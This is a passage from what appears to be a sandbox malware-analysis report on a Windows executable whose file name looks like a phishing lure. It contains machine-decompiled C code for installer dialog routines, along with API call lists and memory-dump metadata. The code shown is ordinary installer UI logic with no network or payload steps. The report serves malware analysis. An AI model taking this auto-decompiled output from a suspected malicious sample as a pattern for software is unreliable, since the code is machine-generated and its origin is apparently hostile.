                                                              				signed int* _t308;
                                                              				int _t309;
                                                              				long _t310;
                                                              				signed int _t311;
                                                              				void* _t313;
                                                              				long _t314;
                                                              				int _t315;
                                                              				signed int _t316;
                                                              				void* _t318;
                                                              
                                                              				_t306 = _a4;
                                                              				_v12 = GetDlgItem(_t306, 0x3f9);
                                                              				_v8 = GetDlgItem(_t306, 0x408);
                                                              				_t318 = SendMessageW;
                                                              				_v20 =  *0x7a8a68;
                                                              				_t282 = 0;
                                                              				_v24 =  *0x7a8a50 + 0x94;
                                                              				if(_a8 != 0x110) {
                                                              					L23:
                                                              					if(_a8 != 0x405) {
                                                              						_t285 = _a16;
                                                              					} else {
                                                              						_a12 = _t282;
                                                              						_t285 = 1;
                                                              						_a8 = 0x40f;
                                                              						_a16 = 1;
                                                              					}
                                                              					if(_a8 == 0x4e || _a8 == 0x413) {
                                                              						_v16 = _t285;
                                                              						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
                                                              							if(( *0x7a8a59 & 0x00000002) != 0) {
                                                              								L41:
                                                              								if(_v16 != _t282) {
                                                              									_t231 = _v16;
                                                              									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
                                                              										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c));
                                                              									}
                                                              									_t232 = _v16;
                                                              									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
                                                              										_t285 = _v20;
                                                              										_t233 =  *(_t232 + 0x5c);
                                                              										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
                                                              											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
                                                              										} else {
                                                              											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
                                                              										}
                                                              									}
                                                              								}
                                                              								goto L48;
                                                              							}
                                                              							if(_a8 == 0x413) {
                                                              								L33:
                                                              								_t285 = 0 | _a8 != 0x00000413;
                                                              								_t239 = E00404A5B(_v8, _a8 != 0x413);
                                                              								_t311 = _t239;
                                                              								if(_t311 >= _t282) {
                                                              									_t88 = _v20 + 8; // 0x8
                                                              									_t285 = _t239 * 0x818 + _t88;
                                                              									_t241 =  *_t285;
                                                              									if((_t241 & 0x00000010) == 0) {
                                                              										if((_t241 & 0x00000040) == 0) {
                                                              											_t242 = _t241 ^ 0x00000001;
                                                              										} else {
                                                              											_t248 = _t241 ^ 0x00000080;
                                                              											if(_t248 >= 0) {
                                                              												_t242 = _t248 & 0x000000fe;
                                                              											} else {
                                                              												_t242 = _t248 | 0x00000001;
                                                              											}
                                                              										}
                                                              										 *_t285 = _t242;
                                                              										E0040117D(_t311);
                                                              										_a12 = _t311 + 1;
                                                              										_a16 =  !( *0x7a8a58) >> 0x00000008 & 0x00000001;
                                                              										_a8 = 0x40f;
                                                              									}
                                                              								}
                                                              								goto L41;
                                                              							}
                                                              							_t285 = _a16;
                                                              							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                              								goto L41;
                                                              							}
                                                              							goto L33;
                                                              						} else {
                                                              							goto L48;
                                                              						}
                                                              					} else {
                                                              						L48:
                                                              						if(_a8 != 0x111) {
                                                              							L56:
                                                              							if(_a8 == 0x200) {
                                                              								SendMessageW(_v8, 0x200, _t282, _t282);
                                                              							}
                                                              							if(_a8 == 0x40b) {
                                                              								_t219 =  *0x7a1f24;
                                                              								if(_t219 != _t282) {
                                                              									ImageList_Destroy(_t219);
                                                              								}
                                                              								_t220 =  *0x7a1f38;
                                                              								if(_t220 != _t282) {
                                                              									GlobalFree(_t220);
                                                              								}
                                                              								 *0x7a1f24 = _t282;
                                                              								 *0x7a1f38 = _t282;
                                                              								 *0x7a8aa0 = _t282;
                                                              							}
                                                              							if(_a8 != 0x40f) {
                                                              								L88:
                                                              								if(_a8 == 0x420 && ( *0x7a8a59 & 0x00000001) != 0) {
                                                              									_t307 = (0 | _a16 == 0x00000020) << 3;
                                                              									ShowWindow(_v8, _t307);
                                                              									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
                                                              								}
                                                              								goto L91;
                                                              							} else {
                                                              								E004011EF(_t285, _t282, _t282);
                                                              								_t192 = _a12;
                                                              								if(_t192 != _t282) {
                                                              									if(_t192 != 0xffffffff) {
                                                              										_t192 = _t192 - 1;
                                                              									}
                                                              									_push(_t192);
                                                              									_push(8);
                                                              									E00404ADB();
                                                              								}
                                                              								if(_a16 == _t282) {
                                                              									L75:
                                                              									E004011EF(_t285, _t282, _t282);
                                                              									_v32 =  *0x7a1f38;
                                                              									_t195 =  *0x7a8a68;
                                                              									_v60 = 0xf030;
                                                              									_v20 = _t282;
                                                              									if( *0x7a8a6c <= _t282) {
                                                              										L86:
                                                              										InvalidateRect(_v8, _t282, 1);
                                                              										_t197 =  *0x7a7a1c; // 0x9ae6de
                                                              										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
                                                              											E00404A16(0x3ff, 0xfffffffb, E00404A2E(5));
                                                              										}
                                                              										goto L88;
                                                              									}
                                                              									_t308 = _t195 + 8;
                                                              									do {
                                                              										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
                                                              										if(_t201 != _t282) {
                                                              											_t287 =  *_t308;
                                                              											_v68 = _t201;
                                                              											_v72 = 8;
                                                              											if((_t287 & 0x00000001) != 0) {
                                                              												_v72 = 9;
                                                              												_v56 =  &(_t308[4]);
                                                              												_t308[0] = _t308[0] & 0x000000fe;
                                                              											}
                                                              											if((_t287 & 0x00000040) == 0) {
                                                              												_t205 = (_t287 & 0x00000001) + 1;
                                                              												if((_t287 & 0x00000010) != 0) {
                                                              													_t205 = _t205 + 3;
                                                              												}
                                                              											} else {
                                                              												_t205 = 3;
                                                              											}
                                                              											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
                                                              											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                              											SendMessageW(_v8, 0x113f, _t282,  &_v72);
                                                              										}
                                                              										_v20 = _v20 + 1;
                                                              										_t308 =  &(_t308[0x206]);
                                                              									} while (_v20 <  *0x7a8a6c);
                                                              									goto L86;
                                                              								} else {
                                                              									_t309 = E004012E2( *0x7a1f38);
                                                              									E00401299(_t309);
                                                              									_t216 = 0;
                                                              									_t285 = 0;
                                                              									if(_t309 <= _t282) {
                                                              										L74:
                                                              										SendMessageW(_v12, 0x14e, _t285, _t282);
                                                              										_a16 = _t309;
                                                              										_a8 = 0x420;
                                                              										goto L75;
                                                              									} else {
                                                              										goto L71;
                                                              									}
                                                              									do {
                                                              										L71:
                                                              										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
                                                              											_t285 = _t285 + 1;
                                                              										}
                                                              										_t216 = _t216 + 1;
                                                              									} while (_t216 < _t309);
                                                              									goto L74;
                                                              								}
                                                              							}
                                                              						}
                                                              						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                              							goto L91;
                                                              						} else {
                                                              							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
                                                              							if(_t226 == 0xffffffff) {
                                                              								goto L91;
                                                              							}
                                                              							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
                                                              							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
                                                              								_t310 = 0x20;
                                                              							}
                                                              							E00401299(_t310);
                                                              							SendMessageW(_a4, 0x420, _t282, _t310);
                                                              							_a12 = _a12 | 0xffffffff;
                                                              							_a16 = _t282;
                                                              							_a8 = 0x40f;
                                                              							goto L56;
                                                              						}
                                                              					}
                                                              				} else {
                                                              					_v32 = 0;
                                                              					_v16 = 2;
                                                              					 *0x7a8aa0 = _t306;
                                                              					 *0x7a1f38 = GlobalAlloc(0x40,  *0x7a8a6c << 2);
                                                              					_t252 = LoadBitmapW( *0x7a8a40, 0x6e);
                                                              					 *0x7a1f2c =  *0x7a1f2c | 0xffffffff;
                                                              					_t313 = _t252;
                                                              					 *0x7a1f34 = SetWindowLongW(_v8, 0xfffffffc, E00405105);
                                                              					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                              					 *0x7a1f24 = _t254;
                                                              					ImageList_AddMasked(_t254, _t313, 0xff00ff);
                                                              					SendMessageW(_v8, 0x1109, 2,  *0x7a1f24);
                                                              					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                              						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                              					}
                                                              					DeleteObject(_t313);
                                                              					_t314 = 0;
                                                              					do {
                                                              						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
                                                              						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
                                                              							if(_t314 != 0x20) {
                                                              								_v16 = _t282;
                                                              							}
                                                              							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E00406054(_t282, _t314, _t318, _t282, _t260)), _t314);
                                                              						}
                                                              						_t314 = _t314 + 1;
                                                              					} while (_t314 < 0x21);
                                                              					_t315 = _a16;
                                                              					_t283 = _v16;
                                                              					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
                                                              					_push(0x15);
                                                              					E004040F6(_a4);
                                                              					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
                                                              					_push(0x16);
                                                              					E004040F6(_a4);
                                                              					_t316 = 0;
                                                              					_t284 = 0;
                                                              					if( *0x7a8a6c <= 0) {
                                                              						L19:
                                                              						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                              						goto L20;
                                                              					} else {
                                                              						_t302 = _v20 + 8;
                                                              						_v28 = _t302;
                                                              						do {
                                                              							_t270 =  &(_t302[0x10]);
                                                              							if( *_t270 != 0) {
                                                              								_v60 = _t270;
                                                              								_t271 =  *_t302;
                                                              								_t294 = 0x20;
                                                              								_v84 = _t284;
                                                              								_v80 = 0xffff0002;
                                                              								_v76 = 0xd;
                                                              								_v64 = _t294;
                                                              								_v40 = _t316;
                                                              								_v68 = _t271 & _t294;
                                                              								if((_t271 & 0x00000002) == 0) {
                                                              									if((_t271 & 0x00000004) == 0) {
                                                              										 *( *0x7a1f38 + _t316 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v84);
                                                              									} else {
                                                              										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
                                                              									}
                                                              								} else {
                                                              									_v76 = 0x4d;
                                                              									_v44 = 1;
                                                              									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
                                                              									_v32 = 1;
                                                              									 *( *0x7a1f38 + _t316 * 4) = _t276;
                                                              									_t284 =  *( *0x7a1f38 + _t316 * 4);
                                                              								}
                                                              							}
                                                              							_t316 = _t316 + 1;
                                                              							_t302 =  &(_v28[0x818]);
                                                              							_v28 = _t302;
                                                              						} while (_t316 <  *0x7a8a6c);
                                                              						if(_v32 != 0) {
                                                              							L20:
                                                              							if(_v16 != 0) {
                                                              								E0040412B(_v8);
                                                              								_t282 = 0;
                                                              								goto L23;
                                                              							} else {
                                                              								ShowWindow(_v12, 5);
                                                              								E0040412B(_v12);
                                                              								L91:
                                                              								return E0040415D(_a8, _a12, _a16);
                                                              							}
                                                              						}
                                                              						goto L19;
                                                              					}
                                                              				}
                                                              			}





























































                                                              0x00404b1c
                                                              0x00404b2d
                                                              0x00404b32
                                                              0x00404b3a
                                                              0x00404b40
                                                              0x00404b48
                                                              0x00404b56
                                                              0x00404b59
                                                              0x00404d7a
                                                              0x00404d81
                                                              0x00404d95
                                                              0x00404d83
                                                              0x00404d85
                                                              0x00404d88
                                                              0x00404d89
                                                              0x00404d90
                                                              0x00404d90
                                                              0x00404da1
                                                              0x00404daf
                                                              0x00404db2
                                                              0x00404dc8
                                                              0x00404e3d
                                                              0x00404e40
                                                              0x00404e42
                                                              0x00404e4c
                                                              0x00404e5a
                                                              0x00404e5a
                                                              0x00404e5c
                                                              0x00404e66
                                                              0x00404e6c
                                                              0x00404e6f
                                                              0x00404e72
                                                              0x00404e8d
                                                              0x00404e74
                                                              0x00404e7e
                                                              0x00404e7e
                                                              0x00404e72
                                                              0x00404e66
                                                              0x00000000
                                                              0x00404e40
                                                              0x00404dcd
                                                              0x00404dd8
                                                              0x00404ddd
                                                              0x00404de4
                                                              0x00404de9
                                                              0x00404ded
                                                              0x00404df8
                                                              0x00404df8
                                                              0x00404dfc
                                                              0x00404e00
                                                              0x00404e04
                                                              0x00404e17
                                                              0x00404e06
                                                              0x00404e06
                                                              0x00404e0d
                                                              0x00404e13
                                                              0x00404e0f
                                                              0x00404e0f
                                                              0x00404e0f
                                                              0x00404e0d
                                                              0x00404e1b
                                                              0x00404e1d
                                                              0x00404e30
                                                              0x00404e33
                                                              0x00404e36
                                                              0x00404e36
                                                              0x00404e00
                                                              0x00000000
                                                              0x00404ded
                                                              0x00404dcf
                                                              0x00404dd6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00404e90
                                                              0x00404e90
                                                              0x00404e97
                                                              0x00404f08
                                                              0x00404f10
                                                              0x00404f18
                                                              0x00404f18
                                                              0x00404f21
                                                              0x00404f23
                                                              0x00404f2a
                                                              0x00404f2d
                                                              0x00404f2d
                                                              0x00404f33
                                                              0x00404f3a
                                                              0x00404f3d
                                                              0x00404f3d
                                                              0x00404f43
                                                              0x00404f49
                                                              0x00404f4f
                                                              0x00404f4f
                                                              0x00404f5c
                                                              0x004050b2
                                                              0x004050b9
                                                              0x004050d6
                                                              0x004050dc
                                                              0x004050ee
                                                              0x004050ee
                                                              0x00000000
                                                              0x00404f62
                                                              0x00404f64
                                                              0x00404f69
                                                              0x00404f6e
                                                              0x00404f73
                                                              0x00404f75
                                                              0x00404f75
                                                              0x00404f76
                                                              0x00404f77
                                                              0x00404f79
                                                              0x00404f79
                                                              0x00404f81
                                                              0x00404fc2
                                                              0x00404fc4
                                                              0x00404fd4
                                                              0x00404fd7
                                                              0x00404fdc
                                                              0x00404fe3
                                                              0x00404fe6
                                                              0x00405088
                                                              0x0040508e
                                                              0x00405094
                                                              0x0040509c
                                                              0x004050ad
                                                              0x004050ad
                                                              0x00000000
                                                              0x0040509c
                                                              0x00404fec
                                                              0x00404fef
                                                              0x00404ff5
                                                              0x00404ffa
                                                              0x00404ffc
                                                              0x00404ffe
                                                              0x00405004
                                                              0x0040500b
                                                              0x00405010
                                                              0x00405017
                                                              0x0040501a
                                                              0x0040501a
                                                              0x00405021
                                                              0x0040502d
                                                              0x00405031
                                                              0x00405033
                                                              0x00405033
                                                              0x00405023
                                                              0x00405025
                                                              0x00405025
                                                              0x00405053
                                                              0x0040505f
                                                              0x0040506e
                                                              0x0040506e
                                                              0x00405070
                                                              0x00405073
                                                              0x0040507c
                                                              0x00000000
                                                              0x00404f83
                                                              0x00404f8e
                                                              0x00404f91
                                                              0x00404f96
                                                              0x00404f98
                                                              0x00404f9c
                                                              0x00404fac
                                                              0x00404fb6
                                                              0x00404fb8
                                                              0x00404fbb
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00404f9e
                                                              0x00404f9e
                                                              0x00404fa4
                                                              0x00404fa6
                                                              0x00404fa6
                                                              0x00404fa7
                                                              0x00404fa8
                                                              0x00000000
                                                              0x00404f9e
                                                              0x00404f81
                                                              0x00404f5c
                                                              0x00404e9f
                                                              0x00000000
                                                              0x00404eb5
                                                              0x00404ebf
                                                              0x00404ec4
                                                              0x00000000
                                                              0x00000000
                                                              0x00404ed6
                                                              0x00404edb
                                                              0x00404ee7
                                                              0x00404ee7
                                                              0x00404ee9
                                                              0x00404ef8
                                                              0x00404efa
                                                              0x00404efe
                                                              0x00404f01
                                                              0x00000000
                                                              0x00404f01
                                                              0x00404e9f
                                                              0x00404b5f
                                                              0x00404b64
                                                              0x00404b6d
                                                              0x00404b74
                                                              0x00404b82
                                                              0x00404b8d
                                                              0x00404b93
                                                              0x00404ba1
                                                              0x00404bb5
                                                              0x00404bba
                                                              0x00404bc7
                                                              0x00404bcc
                                                              0x00404be2
                                                              0x00404bf3
                                                              0x00404c00
                                                              0x00404c00
                                                              0x00404c03
                                                              0x00404c09
                                                              0x00404c0b
                                                              0x00404c0e
                                                              0x00404c13
                                                              0x00404c18
                                                              0x00404c1a
                                                              0x00404c1a
                                                              0x00404c3a
                                                              0x00404c3a
                                                              0x00404c3c
                                                              0x00404c3d
                                                              0x00404c42
                                                              0x00404c45
                                                              0x00404c48
                                                              0x00404c4c
                                                              0x00404c51
                                                              0x00404c56
                                                              0x00404c5a
                                                              0x00404c5f
                                                              0x00404c64
                                                              0x00404c66
                                                              0x00404c6e
                                                              0x00404d39
                                                              0x00404d4c
                                                              0x00000000
                                                              0x00404c74
                                                              0x00404c77
                                                              0x00404c7a
                                                              0x00404c7d
                                                              0x00404c7d
                                                              0x00404c84
                                                              0x00404c8a
                                                              0x00404c8d
                                                              0x00404c93
                                                              0x00404c94
                                                              0x00404c99
                                                              0x00404ca2
                                                              0x00404ca9
                                                              0x00404cac
                                                              0x00404caf
                                                              0x00404cb2
                                                              0x00404cee
                                                              0x00404d17
                                                              0x00404cf0
                                                              0x00404cfd
                                                              0x00404cfd
                                                              0x00404cb4
                                                              0x00404cb7
                                                              0x00404cc6
                                                              0x00404cd0
                                                              0x00404cd8
                                                              0x00404cdf
                                                              0x00404ce7
                                                              0x00404ce7
                                                              0x00404cb2
                                                              0x00404d1d
                                                              0x00404d1e
                                                              0x00404d2a
                                                              0x00404d2a
                                                              0x00404d37
                                                              0x00404d52
                                                              0x00404d56
                                                              0x00404d73
                                                              0x00404d78
                                                              0x00000000
                                                              0x00404d58
                                                              0x00404d5d
                                                              0x00404d66
                                                              0x004050f0
                                                              0x00405102
                                                              0x00405102
                                                              0x00404d56
                                                              0x00000000
                                                              0x00404d37
                                                              0x00404c6e

                                                              APIs
                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404B25
                                                              • GetDlgItem.USER32(?,00000408), ref: 00404B30
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7A
                                                              • LoadBitmapW.USER32(0000006E), ref: 00404B8D
                                                              • SetWindowLongW.USER32(?,000000FC,00405105), ref: 00404BA6
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBA
                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCC
                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE2
                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEE
                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C00
                                                              • DeleteObject.GDI32(00000000), ref: 00404C03
                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2E
                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3A
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD0
                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFB
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D0F
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404D3E
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4C
                                                              • ShowWindow.USER32(?,00000005), ref: 00404D5D
                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5A
                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EBF
                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED4
                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF8
                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F18
                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404F2D
                                                              • GlobalFree.KERNEL32(?), ref: 00404F3D
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB6
                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040505F
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506E
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040508E
                                                              • ShowWindow.USER32(?,00000000), ref: 004050DC
                                                              • GetDlgItem.USER32(?,000003FE), ref: 004050E7
                                                              • ShowWindow.USER32(00000000), ref: 004050EE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                              • String ID: $M$N
                                                              • API String ID: 1638840714-813528018
                                                              • Opcode ID: 7e0d7925856d8dc2a293aec0a36156ab26fb8fad00dbeb743b55e37ef2f2f0d3
                                                              • Instruction ID: d02e9a787b540977323fb19233601523635b60db84404d8275966fa362dc0732
                                                              • Opcode Fuzzy Hash: 7e0d7925856d8dc2a293aec0a36156ab26fb8fad00dbeb743b55e37ef2f2f0d3
                                                              • Instruction Fuzzy Hash: 81027EB0900209EFEB109F94DD85AAE7BB5FB85314F10813AF610BA2E1CB799D51CF58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 78%
                                                              			E00404591(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                              				signed int _v8;
                                                              				signed int _v12;
                                                              				long _v16;
                                                              				long _v20;
                                                              				long _v24;
                                                              				char _v28;
                                                              				intOrPtr _v32;
                                                              				long _v36;
                                                              				char _v40;
                                                              				unsigned int _v44;
                                                              				signed int _v48;
                                                              				WCHAR* _v56;
                                                              				intOrPtr _v60;
                                                              				intOrPtr _v64;
                                                              				intOrPtr _v68;
                                                              				WCHAR* _v72;
                                                              				void _v76;
                                                              				struct HWND__* _v80;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				intOrPtr _t82;
                                                              				long _t87;
                                                              				short* _t89;
                                                              				void* _t95;
                                                              				signed int _t96;
                                                              				int _t109;
                                                              				signed short _t114;
                                                              				signed int _t118;
                                                              				struct HWND__** _t122;
                                                              				intOrPtr* _t138;
                                                              				WCHAR* _t146;
                                                              				intOrPtr _t147;
                                                              				unsigned int _t150;
                                                              				signed int _t152;
                                                              				unsigned int _t156;
                                                              				signed int _t158;
                                                              				signed int* _t159;
                                                              				signed int* _t160;
                                                              				struct HWND__* _t166;
                                                              				struct HWND__* _t167;
                                                              				int _t169;
                                                              				unsigned int _t197;
                                                              
                                                              				_t156 = __edx;
                                                              				_t82 =  *0x7a0f18; // 0x9ab874
                                                              				_v32 = _t82;
                                                              				_t2 = _t82 + 0x3c; // 0x0
                                                              				_t3 = _t82 + 0x38; // 0x0
                                                              				_t146 = ( *_t2 << 0xb) + 0x7a9000;
                                                              				_v12 =  *_t3;
                                                              				if(_a8 == 0x40b) {
                                                              					E0040575B(0x3fb, _t146);
                                                              					E004062C6(_t146);
                                                              				}
                                                              				_t167 = _a4;
                                                              				if(_a8 != 0x110) {
                                                              					L8:
                                                              					if(_a8 != 0x111) {
                                                              						L20:
                                                              						if(_a8 == 0x40f) {
                                                              							L22:
                                                              							_v8 = _v8 & 0x00000000;
                                                              							_v12 = _v12 & 0x00000000;
                                                              							E0040575B(0x3fb, _t146);
                                                              							if(E00405AEE(_t186, _t146) == 0) {
                                                              								_v8 = 1;
                                                              							}
                                                              							E00406032(0x79ff10, _t146);
                                                              							_t87 = E00406408(1);
                                                              							_v16 = _t87;
                                                              							if(_t87 == 0) {
                                                              								L30:
                                                              								E00406032(0x79ff10, _t146);
                                                              								_t89 = E00405A91(0x79ff10);
                                                              								_t158 = 0;
                                                              								if(_t89 != 0) {
                                                              									 *_t89 = 0;
                                                              								}
                                                              								if(GetDiskFreeSpaceW(0x79ff10,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                              									goto L35;
                                                              								} else {
                                                              									_t169 = 0x400;
                                                              									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                              									asm("cdq");
                                                              									_v48 = _t109;
                                                              									_v44 = _t156;
                                                              									_v12 = 1;
                                                              									goto L36;
                                                              								}
                                                              							} else {
                                                              								_t159 = 0;
                                                              								if(0 == 0x79ff10) {
                                                              									goto L30;
                                                              								} else {
                                                              									goto L26;
                                                              								}
                                                              								while(1) {
                                                              									L26:
                                                              									_t114 = _v16(0x79ff10,  &_v48,  &_v28,  &_v40);
                                                              									if(_t114 != 0) {
                                                              										break;
                                                              									}
                                                              									if(_t159 != 0) {
                                                              										 *_t159 =  *_t159 & _t114;
                                                              									}
                                                              									_t160 = E00405A32(0x79ff10);
                                                              									 *_t160 =  *_t160 & 0x00000000;
                                                              									_t159 = _t160;
                                                              									 *_t159 = 0x5c;
                                                              									if(_t159 != 0x79ff10) {
                                                              										continue;
                                                              									} else {
                                                              										goto L30;
                                                              									}
                                                              								}
                                                              								_t150 = _v44;
                                                              								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                              								_v44 = _t150 >> 0xa;
                                                              								_v12 = 1;
                                                              								_t158 = 0;
                                                              								__eflags = 0;
                                                              								L35:
                                                              								_t169 = 0x400;
                                                              								L36:
                                                              								_t95 = E00404A2E(5);
                                                              								if(_v12 != _t158) {
                                                              									_t197 = _v44;
                                                              									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                              										_v8 = 2;
                                                              									}
                                                              								}
                                                              								_t147 =  *0x7a7a1c; // 0x9ae6de
                                                              								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                              									E00404A16(0x3ff, 0xfffffffb, _t95);
                                                              									if(_v12 == _t158) {
                                                              										SetDlgItemTextW(_a4, _t169, 0x79ff00);
                                                              									} else {
                                                              										E0040494D(_t169, 0xfffffffc, _v48, _v44);
                                                              									}
                                                              								}
                                                              								_t96 = _v8;
                                                              								 *0x7a8ae4 = _t96;
                                                              								if(_t96 == _t158) {
                                                              									_v8 = E0040140B(7);
                                                              								}
                                                              								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                              									_v8 = _t158;
                                                              								}
                                                              								E00404118(0 | _v8 == _t158);
                                                              								if(_v8 == _t158 &&  *0x7a1f30 == _t158) {
                                                              									E00404526();
                                                              								}
                                                              								 *0x7a1f30 = _t158;
                                                              								goto L53;
                                                              							}
                                                              						}
                                                              						_t186 = _a8 - 0x405;
                                                              						if(_a8 != 0x405) {
                                                              							goto L53;
                                                              						}
                                                              						goto L22;
                                                              					}
                                                              					_t118 = _a12 & 0x0000ffff;
                                                              					if(_t118 != 0x3fb) {
                                                              						L12:
                                                              						if(_t118 == 0x3e9) {
                                                              							_t152 = 7;
                                                              							memset( &_v76, 0, _t152 << 2);
                                                              							_v80 = _t167;
                                                              							_v72 = 0x7a1f40;
                                                              							_v60 = E004048E7;
                                                              							_v56 = _t146;
                                                              							_v68 = E00406054(_t146, 0x7a1f40, _t167, 0x7a0718, _v12);
                                                              							_t122 =  &_v80;
                                                              							_v64 = 0x41;
                                                              							__imp__SHBrowseForFolderW(_t122);
                                                              							if(_t122 == 0) {
                                                              								_a8 = 0x40f;
                                                              							} else {
                                                              								__imp__CoTaskMemFree(_t122);
                                                              								E004059E6(_t146);
                                                              								_t125 =  *((intOrPtr*)( *0x7a8a50 + 0x11c));
                                                              								if( *((intOrPtr*)( *0x7a8a50 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis") {
                                                              									E00406054(_t146, 0x7a1f40, _t167, 0, _t125);
                                                              									if(lstrcmpiW(0x7a69e0, 0x7a1f40) != 0) {
                                                              										lstrcatW(_t146, 0x7a69e0);
                                                              									}
                                                              								}
                                                              								 *0x7a1f30 =  *0x7a1f30 + 1;
